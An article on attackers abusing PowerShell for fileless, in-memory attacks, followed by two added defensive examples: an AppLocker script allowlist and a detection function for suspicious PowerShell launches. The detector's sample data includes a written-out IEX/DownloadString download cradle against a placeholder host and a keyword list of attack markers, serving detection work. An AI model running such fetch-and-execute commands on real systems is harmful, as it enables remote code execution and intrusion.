POWERSHELL, Microsoft’s “automation platform and scripting language,” combines the ease of batch files with the power of a programming language to provide remote management able to handle almost every Windows computer issue. Built upon the .NET framework, PowerShell gives admins amazing access and control. Unfortunately, it also gives amazing access and control to attackers.
“If it’s easier for IT admins, it’s easier for attackers,” says Mike Viscuso, co-founder and CTO of Carbon Black Inc., a Waltham, Mass.-based international endpoint security provider with 750 employees and more than 3,000 customers worldwide. “Anti-virus protection has been focused on scanning new files for malware. A bunch of hackers have realized they can skip the effort of creating files that pass AV checks and just leverage PowerShell to do the same hacking jobs.”
Now 10 years old, PowerShell is part of Microsoft’s Windows Management Framework and has shipped with every Windows client and server release since Windows 7 and Windows Server 2008 R2. Viscuso says, “Nearly every IT department uses PowerShell,” and the same holds for MSPs and resellers doing remote administration.
In a typical attack chain, spear phishing or malicious code on a website gets the attacker’s payload running inside the browser. From there the malware starts powershell.exe on the system and feeds it commands. Nothing malicious is written to disk, so file-scanning AV has nothing to inspect. When attackers do use files, one technique is to pull the script content straight into PowerShell’s memory and run it there rather than saving it first, which again sidesteps file scans.
Donald R. Howard, president and CTO of My IT Company, just west of Chicago, believes one customer’s ransomware attack might have been through PowerShell. “We tracked the sources of two attacks, but the third was different.” His team puts proper gateways in place and “we monitor the blogosphere to see what’s new,” he adds. He also notes that keeping up with scripting is critical. “It’s not like riding a bike.”
“Two macro trends make life easier for attackers,” says Viscuso. “Device mobility means more users are working outside the corporate walls, and security tools, than they used to. And critical work is done in the cloud now, sometimes from a laptop in Starbucks, ignoring requests to use a corporate VPN, which means your network security infrastructure can’t help protect you.”
The need for increased endpoint security, suggests Viscuso, is far greater than before. In addition, whitelisting PowerShell scripts by how they are deployed or where they are stored can help: define those rules, then block any script execution that falls outside them.
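One way to express the rule just described, as an added example that is not code from the article or from Carbon Black: an AppLocker policy for the Script rule collection that allows scripts only from two locations and blocks everything else. It assumes `C:\Scripts` is the IT-managed script directory (writable by administrators only; a path rule is only as strong as the ACL on the folder it names) and a Windows edition where AppLocker is enforced. Both file paths passed to `Test-AppLockerPolicy` are constructed for the example.

```powershell
# Added example (not from the article): AppLocker script rules that allow only
# scripts deployed to C:\Scripts (assumed admin-managed, admin-writable only)
# or shipped under Program Files, and block every other script file.
# Run from an elevated PowerShell on a Windows edition that enforces AppLocker.

$PolicyPath = Join-Path $env:TEMP 'script-allowlist.xml'

# Each rule needs its own GUID; S-1-1-0 is the well-known Everyone SID.
# Once any Allow rule exists in the collection, scripts matching no rule are denied.
$PolicyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Approved scripts" Description="Scripts deployed by IT to the managed script directory" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePathCondition Path="C:\Scripts\*" />
      </Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Program Files scripts" Description="Scripts shipped with installed software" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePathCondition Path="%PROGRAMFILES%\*" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@
Set-Content -Path $PolicyPath -Value $PolicyXml -Encoding UTF8

# Dry run before enforcing: how would the policy treat a deployed script versus
# one dropped into a user-writable folder? (Constructed paths; the files must
# exist for Test-AppLockerPolicy to evaluate them.)
Test-AppLockerPolicy -XmlPolicy $PolicyPath -User Everyone `
    -Path 'C:\Scripts\deploy.ps1', 'C:\Users\Public\dropper.ps1' |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# AppLocker enforces nothing unless the Application Identity service is running.
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc

# Merge the Script rules into the local policy. For domain-wide rollout, import
# the same XML into a GPO (or use Set-AppLockerPolicy -Ldap).
Set-AppLockerPolicy -XmlPolicy $PolicyPath -Merge
```

Two caveats a practitioner should keep in mind. First, with Script rules enforced, PowerShell 5 and later does not simply refuse disallowed scripts: it runs them, and the interactive console, in Constrained Language Mode, so a `powershell.exe -Command` or `-EncodedCommand` one-liner still executes, just without access to .NET types and other capabilities the attack chain usually relies on. Second, the Script collection says nothing about who may launch powershell.exe itself; stopping a browser from spawning it is a job for the Executable rules or for the behaviour-based endpoint tooling the article describes.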
Endpoint tools that judge program activity (which process launched PowerShell, and what it does next) rather than scanning files can stop malicious PowerShell use. When such software sees suspicious activity, it can quarantine the file involved or terminate the PowerShell process.
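What "judging activity" looks like in practice, for the browser-to-PowerShell chain described earlier and the behaviour-based detection above, as an added example that is not code from the article or from any vendor: a rule over process-creation records that flags powershell.exe when a browser started it or when its command line carries the markers of code being pulled straight into memory. The field names (`Time`, `ParentImage`, `Image`, `CommandLine`) follow what Sysmon Event ID 1 or Windows 4688 auditing provides; the three records are constructed sample data, the encoded command is a truncated placeholder, and the URL is an invalid example host.

```powershell
# Added example (not from the article): a behaviour rule over process-creation
# records. Field names follow Sysmon Event ID 1 / Windows 4688; the records at
# the bottom are constructed sample data, not real telemetry.

$BrowserImages = @('chrome.exe', 'firefox.exe', 'msedge.exe', 'iexplore.exe')

# Command-line fragments seen when PowerShell pulls code into memory or hides
# what it runs. None is proof on its own; together with a browser parent they
# are a strong signal.
$InMemoryMarkers = @(
    '-EncodedCommand', 'FromBase64String',
    'DownloadString', 'Invoke-Expression', 'IEX',
    '-WindowStyle Hidden', '-ExecutionPolicy Bypass'
)

function Find-SuspiciousPowerShellLaunch {
    param([Parameter(Mandatory)][object[]]$ProcessEvents)

    foreach ($record in $ProcessEvents) {
        $image  = [System.IO.Path]::GetFileName($record.Image).ToLowerInvariant()
        $parent = [System.IO.Path]::GetFileName($record.ParentImage).ToLowerInvariant()
        if ($image -notin @('powershell.exe', 'pwsh.exe')) { continue }

        $reasons = @()
        if ($parent -in $BrowserImages) { $reasons += "launched by browser ($parent)" }

        # -match is case-insensitive; Escape makes each marker a literal match.
        $hits = @($InMemoryMarkers | Where-Object { $record.CommandLine -match [regex]::Escape($_) })
        if ($hits.Count -gt 0) { $reasons += "in-memory markers: $($hits -join ', ')" }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time        = $record.Time
                Parent      = $parent
                CommandLine = $record.CommandLine
                Reasons     = $reasons -join '; '
            }
        }
    }
}

# Constructed records: a legitimate admin script launched from Explorer, a
# browser-spawned hidden encoded one-liner, and a download cradle started by a
# service host. The base64 is a truncated placeholder; the host is not real.
$SampleEvents = @(
    [pscustomobject]@{
        Time = '2016-09-12 10:01:05'; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -File C:\Scripts\backup.ps1'
    },
    [pscustomobject]@{
        Time = '2016-09-12 10:02:41'; ParentImage = 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA...'
    },
    [pscustomobject]@{
        Time = '2016-09-12 10:03:02'; ParentImage = 'C:\Windows\System32\svchost.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/x'')"'
    }
)

Find-SuspiciousPowerShellLaunch -ProcessEvents $SampleEvents | Format-List
```

Against the sample data the first record stays silent and the other two are reported, the second for both its browser parent and its hidden encoded command, the third for the IEX/DownloadString cradle alone. The same function can be pointed at live data by mapping `Get-WinEvent` output for the Sysmon or 4688 events into objects with these four fields; a response hook that stops the flagged process is where a behaviour-based endpoint product picks up.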